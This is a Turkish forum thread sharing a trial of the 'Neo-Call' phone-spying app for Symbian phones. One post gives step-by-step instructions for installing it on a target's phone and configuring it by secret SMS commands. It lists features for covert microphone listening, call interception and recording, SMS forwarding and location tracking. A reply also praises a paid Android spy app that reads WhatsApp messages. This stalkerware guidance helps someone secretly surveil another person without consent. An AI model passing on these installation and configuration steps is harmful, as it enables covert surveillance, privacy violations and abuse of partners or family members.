Casus Dinleme Programı TRİAL Versiyon

Sponsorlu Bağlantılar

kahraman7777

Üye
çok güzel bir program eline sağlık kardeşim

serserim0205

Üye
çalişiyormu kardeş deneyen varmı

akimaniacs

Üye
Merhaba,
.jar destekli gelen ve giden görüşmeleri kaydetme programı yokmu?

kalmaoglu

Üye
emegine saglık

matrak104

Üye
Arkadaşlar program birçok modelde çalımıyor. Bu tarz başka programlar da buldum ancak hiç yükleme daha iyi. Rezil olursun allah korusun :) Para vermeden bu iş olmayacak dedim ve adlı Android telefon için satın aldım. Program sayesinde, telefon görüşmelerini dinleyebiliyorum, ortamı dinleyebiliyorum, kısa mesajları, facebook, whatsapp yazışmalarını bile takip ediyorum. Ne zaman nereye gitmiş harita üstünde görüyorum. Uzun süren arayışlarım sona erdi. Verdiğim parayı son kuruşuna kadar hakediyor program. Bu tarz bir program satın almak isteyenlere şiddetle tavsiye ederim. Teknik destekleri gayet başarılı. Kurulum ve kullanım kılavuzları tamamen Türkçe. Gece gündüz ne zaman desteğe ihtiyacım olsa sağolsunlar yalnız bırakmadılar. Site adresi:

sakra01

Üye
galaksi noteye uyumlumu bu:)

Hasand.

Hasand.

Üye
teşekür ederım

karar1001

Üye
Programı - Trial

PROGRAMIN KULLANIMI...[/COLemegine saglikOR][/FONT][/B]

[/SIZE] ### Neo-Call TRIAL Application (.SIS files) for s60fp1 and S60fp2 [Symbian OS7/8] ###
--- Neo-DENEME SÜRÜMÜ (2 hours) ---

*** BU DENEME SÜRÜMÜNDE BULUNANLAR Neo-SMS, Neo-LIST, Neo-TRAX, Neo-LOG, Neo-PHONE², Neo-INTERCEPTOR, Neo-CONTROL, Neo-RECORD ***

fp1demo.sis dosyasını aşağıdaki UYUMLU telefonlardan herhangi birine transfer edip yükleyiniz.(dosya adını değiştirmeyiniz !) aşağıdaki telefonlardan herhangi birine sahipseniz: fp1demo.sis
dosyasını yükleyiniz.

Nokia 3230, Nokia 6670, Nokia 6260, Nokia 7610,
Nokia 6620, Nokia 6600, Panasonic X700, Samsung SGH - D720
EĞER TELEFONUNUZ AŞAĞIDAKİLERDEN BİRİYSE: fp2 demo.sis DOSYASINI YÜKLEMELİSİNİZ.

Transfer and Install fp2demo.sis (do not rename the FILENAME !) if you have any of the following phones:
Lenovo P930, Nokia N72, Nokia N70, Nokia N90, Nokia 6682,
Nokia 6681, Nokia 6680, Nokia 3230, Nokia 6670, Nokia 6630,
Nokia 6260, Nokia 7610, Nokia 6620, Nokia 6600, Panasonic X800
Panasonic X700, Samsung SGH-Z600, Samsung SGH - D720
Samsung SGH-D730

Yükleme sırasında'' telefonamı ypksa hafıza kartınamı yüklensin''sorusu çıkabilir bu durumda kesinlikle TELEFON hafızası seçilmelidir.

Yükelme tamamlandıktan sonra 2 dakika sonra program çalışmaya başlar.Telefonu kapatıp açmanıza gerek yoktur (isterseniz kapatıp açabilirsinizr !)

Yapılandırmada ilk adım olarak numara tanımla(dinleme yapacağınız numara)gerçekleştirilmelidir.
B adım için yapmanız gereken kendi telefonunuzdan programı yüklediğiniz telefona aşağıda görünen formatta bir sms göndermek olacaktır;

#1234#<sms>+90532???0000(telefon numarası kendi telefon numaranız olacak)

Bu komutın amacı yukarıda tanımladığınız numaranıza SMS mesajlarının birer kopyasını yönlendirmektir.

Bu komutu gönderdikten sonra aşağıdaki komutuda SMS olarak karşı telefona gönderip yapılandırma raporu alabilrsiniz
#1234#603

Eğer fll Yapabilirseniz çok harika bir program.
Ben daha denemedim deneyen varsa buraya bekliyoruz...
NEOCALL programının özellikleri

*1- TELEFONNUN MİKROFONUNU KULLANARAK MESAFE SINIRI OLMADAN ORTAM DİNELEYEBİLEME

*2- TELEFON GÖRÜŞMELERİNİ DİNLEYEBİLME

*3- HEDEF TELEFONA GELEN VE GİDEN TÜM SMS LERİN BİRER KOPYASINI SİZE YÖNLENDİRME

*4- TELEFONDA YAPTIĞI TÜM GÖRÜŞMELERİ GİZLİCE KAYDETME

*5- TELEFONUN BULUNDUĞU YERİ TESPİT EDEBİLME

*6- TELEFONDAKİ ARAMA KAYITLARINI SMS RAPORU OLARAK LİSTE HALİNDE ALABİLME

*7- TELEFON ÇALINDIĞINDA ÇALANLARI HEMEN BULABİLME

*8- YUKARIDAKİ TÜM ÖZELLİKLERİ TELEFONDA GİZLİ BİR DOSYAYA KAYDEDİP DAHA SONRA KENDTELEFONUNUZAAKTARABİLME (yeni)

*9- SİMKART DEĞİŞTİRİLDİĞİNDE YENİ TAKILAN SİM KARTIN NUMARASI SİZE HEMEN. SMS OLARAK GELİR

*10- HEDEF TELEFONA BİR GİZLİ SMS KOMUTU GÖNDERİN GİZLİCE SİZİ ARASIN VE ORTAMI DİNLEYİN

[/QUOTE]

ö.m.g

Üye
dediklerini harfiyn yaptm ama olmadı

kaazam

kaazam

Üye
güzel program gerçekten teşekkürler program ful olsaydı tl yüklücektim ama yinede teşekkürler